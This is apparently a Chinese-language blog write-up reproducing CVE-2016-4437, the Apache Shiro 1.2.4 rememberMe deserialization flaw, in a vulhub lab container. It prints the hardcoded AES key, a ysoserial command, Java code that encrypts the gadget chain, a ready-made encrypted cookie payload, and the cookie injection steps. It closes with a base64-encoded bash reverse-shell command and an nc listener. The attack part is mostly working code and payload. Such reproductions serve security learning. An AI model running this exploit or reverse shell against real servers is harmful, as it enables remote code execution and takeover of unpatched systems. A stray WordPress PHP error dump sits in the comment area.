CVE-2016-4437复现

文章目录[x]
  1. 1:环境搭建
  2. 2:生成payload
  3. 3:执行
  4. 4:反弹shell

概述

Apache Shiro 1.2.4反序列化漏洞

影响版本:Apache Shiro <= 1.2.4

原因:Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

代码分析

在org.apache.shiro.mgt.AbstractRememberMeManager的第26行硬编码了AES密钥,

public abstract class AbstractRememberMeManager implements RememberMeManager {
    private static final Logger log = LoggerFactory.getLogger(AbstractRememberMeManager.class);
    private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");
    private Serializer<PrincipalCollection> serializer = new DefaultSerializer();
    private CipherService cipherService = new AesCipherService();
    private byte[] encryptionCipherKey;
    private byte[] decryptionCipherKey;

在156行以及167行对反序列化后的数据进行加解密的时候使用的都是此密钥,

    protected byte[] encrypt(byte[] serialized) {
        byte[] value = serialized;
        CipherService cipherService = this.getCipherService();
        if (cipherService != null) {
            ByteSource byteSource = cipherService.encrypt(serialized, this.getEncryptionCipherKey());
            value = byteSource.getBytes();
        }

        return value;
    }
protected byte[] decrypt(byte[] encrypted) {
    byte[] serialized = encrypted;
    CipherService cipherService = this.getCipherService();
    if (cipherService != null) {
        ByteSource byteSource = cipherService.decrypt(encrypted, this.getDecryptionCipherKey());
        serialized = byteSource.getBytes();
    }

    return serialized;
}

复现

环境搭建

这里我使用的是vulhub/shiro:1.2.4这个镜像,将容器中的8080端口转发至宿主机的8080端口,搭建过程见vulhub

生成payload

这里我使用的是ysoserial这个反序列化工具,设置payload为touch /tmp/test`,命令` java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/test" > ~/poc.ser,IDEA中创建一个maven工程,引入依赖:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>CVE-2016-4437</artifactId>
    <version>1.0-SNAPSHOT</version>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

    <dependencies>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>compile</scope>
        </dependency>
        <dependency>
            <groupId>org.apache.shiro</groupId>
            <artifactId>shiro-core</artifactId>
            <version>1.2.4</version>
        </dependency>
    </dependencies>

</project>

将先前生成好的poc.ser文件放入项目目录,这里给出我的项目目录:

image-20211105085335113

对poc.ser进行处理,生成反序列化以及加密后的数据,代码如下:

import org.apache.shiro.codec.Base64;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

import java.nio.file.FileSystems;
import java.nio.file.Files;

import org.junit.Test;

public class gen {
    @Test
    public void REC() throws Exception {
        byte[] payload = Files.readAllBytes(FileSystems.getDefault().getPath("", "", "poc.ser"));
        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));

        ByteSource cipherText = aes.encrypt(payload, key);
        System.out.println(cipherText);
    }
}

执行,得到payload:

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

执行

打开http://localhost:8080,启动burp抓包,勾选"remember me",查看请求包及返回包:image-20211105090130424

image-20211105090154471

在请求包的cookie中添加一个字段rememberMe,值为先前生成的payload:

image-20211105091030950

进入docker中查看效果

执行前:image-20211105091139304

执行后:

image-20211105091201286

可以发现成功执行了命令

反弹shell

命令为bash -i >& /dev/tcp/ip/port 0>& 1`,注意`>&之间不能有空格,这里需要将payload转换成runtime exec,转换后如下:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JiAx}|{base64,-d}|{bash,-i}

nc监听:

image-20211105161506675

点赞
  1. Yonnit说道:
    Google Chrome Windows 10

    Fatal error: Uncaught ArgumentCountError: Too few arguments to function Walker_Comment::filter_comment_text(), 1 passed in /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php on line 303 and exactly 2 expected in /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php:267 Stack trace: #0 /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php(303): Walker_Comment->filter_comment_text() #1 /www/wwwroot/lolimoe.fun/wp-includes/plugin.php(189): WP_Hook->apply_filters() #2 /www/wwwroot/lolimoe.fun/wp-content/themes/kratos-master/inc/ua.php(432): apply_filters() #3 /www/wwwroot/lolimoe.fun/wp-content/themes/kratos-master/inc/ua.php(436): user_agent_display_comment() #4 /www/wwwroot/lolimoe.fun/wp-includes/class-wp-hook.php(305): user_agent() #5 /www/wwwroot/lolimoe.fun/wp-includes/plugin.php(189): WP_Hook->apply_filters() #6 /www/wwwroot/lolimoe.fun/wp-includes/comment-template.php(1028): apply_filters() #7 /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php(361): comment_text() #8 /www/wwwroot/lolimoe.fun/wp in /www/wwwroot/lolimoe.fun/wp-includes/class-walker-comment.php on line 267